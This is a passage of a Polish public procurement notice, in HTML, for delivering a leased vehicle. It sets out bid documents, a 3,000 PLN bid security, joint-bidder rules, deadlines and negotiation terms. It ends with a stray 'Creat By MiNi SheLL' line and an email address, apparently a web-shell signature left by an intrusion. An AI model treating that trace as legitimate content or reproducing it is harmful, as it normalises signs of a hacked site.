siedzibę<br/>lub miejsce zamieszkania, lub miejsce zamieszkania ma osoba, której dokument miał dotyczyć nie ma przepisów o oświadczeniu<br/>pod przysięgą, złożone przed organem sądowym lub administracyjnym, notariuszem, organem samorządu zawodowego lub<br/>gospodarczego, właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy lub miejsce zamieszkania osoby, której<br/>dokument miał dotyczyć.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">nie dotyczy</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1) Na ofertę składają się następujące dokumenty:<br/>a) Formularz ofertowy, zgodnie z załącznikiem nr 1 do SWZ<br/>b) Oświadczenie Wykonawcy o niepodleganiu wykluczenia oraz spełnianiu warunków udziału w postępowaniu, zgodnie z<br/>załącznikiem nr 2 do SWZ – w przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie o<br/>niepodleganiu wykluczenia składa każdy<br/>z Wykonawców,<br/>c) Pełnomocnictwo upoważniające do złożenia oferty, o ile ofertę składa pełnomocnik,<br/>d) Pełnomocnictwo do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się o udzielenie zamówienie<br/>– dotyczy ofert składanych przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia, o których mowa w<br/>rozdziale XI SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Każdy Wykonawca przystępujący do przetargu jest obowiązany wnieść wadium w wysokości 3 000,00 PLN.<br/>2. Wadium musi obejmować cały okres związania ofertą i może być wniesione: w pieniądzu, gwarancjach bankowych,<br/>gwarancjach ubezpieczeniowych, poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z<br/>dnia 9.11.2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.<br/>3. W przypadku wyboru wpłaty wadium w pieniądzu należy je wnieść przelewem na rachunek bankowy Zamawiającego<br/>PKO Bank Polski S.A. 36 1020 4027 0000 1402 1525 1769.<br/>Przy wnoszeniu wadium Wykonawca winien na blankiecie przelewu powołać się na nazwę zadania podaną przez Zamawiającego.<br/>Wydanie polecenia przelewu nie jest jednoznaczne z wniesieniem, dokonaniem zapłaty określonej kwoty wadium. O uznaniu<br/>przez Zamawiającego, że wadium w pieniądzu wpłacono w wymaganym terminie, decyduje data i godzina wpływu środków<br/>na wskazany wyżej rachunek Zamawiającego.<br/>4. Jeżeli Wykonawca wnosi wadium w innej formie niż pieniężna tj. w formie gwarancji lub poręczenia, Wykonawca<br/>przekazuje Zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej podpisany przez osobę lub osoby<br/>uprawnione ze strony gwaranta / poręczyciela przy użyciu środków komunikacji elektronicznej za pośrednictwem Platformy<br/>na stronie internetowej prowadzonego postępowania, o której mowa w rozdziale<br/>I SWZ.<br/>Z treści gwarancji winno wynikać bezwarunkowe, na każde żądanie zgłoszone przez Zamawiającego w terminie związania<br/>ofertą, zobowiązanie gwaranta/poręczyciela do wypłaty Zamawiającemu pełnej kwoty wadium we wszystkich<br/>okolicznościach określonych w ustawie Prawo zamówień publicznych - art. 98 ust. 6 ustawy Pzp.<br/>5. Wadium we wszystkich dopuszczonych formach wnosi się przed upływem terminu składania ofert i utrzymuje<br/>nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust.1 pkt 2 i 3<br/>oraz ust. 2 ustawy Pzp.<br/>6. Pozostałe zapisy dot. wadium znajdują się w rozdziale XV SWZ. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>2. Podmioty występujące wspólnie ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie<br/>zamówienia.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w<br/>postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia<br/>publicznego. Ustanowiony pełnomocnik pozostaje w kontakcie z Zamawiającym w toku postępowania: zwraca się do<br/>Zamawiającego z wszelkimi sprawami i do niego Zamawiający kieruje informacje, korespondencję itp. Pełnomocnictwo<br/>winno być załączone do oferty.<br/>4. Przepisy Prawa zamówień publicznych dotyczące Wykonawcy stosuje się odpowiednio do Wykonawców wspólnie<br/>ubiegających się o zamówienie.<br/>5. Każdy z Wykonawców występujących wspólnie zobowiązany jest do wykazania brak podstaw do wykluczenia z<br/>postępowania o udzielenie zamówienia publicznego. W takim przypadku oświadczenia i/lub dokumenty wymienione w<br/>rozdziale IX SWZ składa każdy z Wykonawców występujących wspólnie. Dokumenty te potwierdzają spełnianie warunków<br/>udziału w postępowaniu oraz brak podstaw wykluczenia w zakresie, w którym każdy z Wykonawców wykazuje spełnianie<br/>warunków udziału w postępowaniu oraz brak podstaw wykluczenia.<br/>6. Jeżeli została wybrana oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia, Zamawiający może<br/>żądać przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy oraz warunków ich wprowadzenia zostały zawarte w projektowanych postanowieniach umowy stanowiącym załącznik<br/>do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-09-12 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/transakcja/1168578</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-09-12 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-10-11</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h3 class="mb-0">8.7) Kryteria oceny ofert, które zamawiający zamierza stosować w celu ograniczenia liczby wykonawców: </h3> Zgodnie z art. 281 ust. 3 ustawy Pzp Zamawiający przewiduje możliwość ograniczenia liczby Wykonawców których zaprosi<br/>do negocjacji stosując kryteria oceny ofert opisane w rozdziale XIX SWZ. Liczba wykonawców, których Zamawiający zaprosi<br/>do negocjacji ofert wynosi 5 (pięć), tj. Zamawiający zaprosi 5 (pięciu) Wykonawców, którzy otrzymali najwyższą liczbę punktów<br/>w kryterium oceny ofert. <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1) Z postępowania o udzielenie zamówienia wyklucza się Wykonawców, w stosunku do których zachodzi okoliczność<br/>wskazana w art. 7 ust. 1 ustawy o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę<br/>oraz służących ochronie bezpieczeństwa narodowego.<br/><br/>2) Zamawiający w związku z brakiem możliwości technicznych wskazania w niniejszym ogłoszeniu o zamówieniu terminu dostawy pojazdu w tygodniach, określił termin realizacji w 84 dniach co odpowiada 12 tygodniom. Ponadto termin dostawy pojazdu stanowi kryterium oceny ofert. <br/><br/>3) Zamawiający informuje, że postępowanie którego przedmiotem jest dostawa samochodu obejmuje także formę finansowania - leasing operacyjny którego okres Zamawiający określił na 36 miesięcy.

Creat By MiNi SheLL
Email: jattceo@gmail.com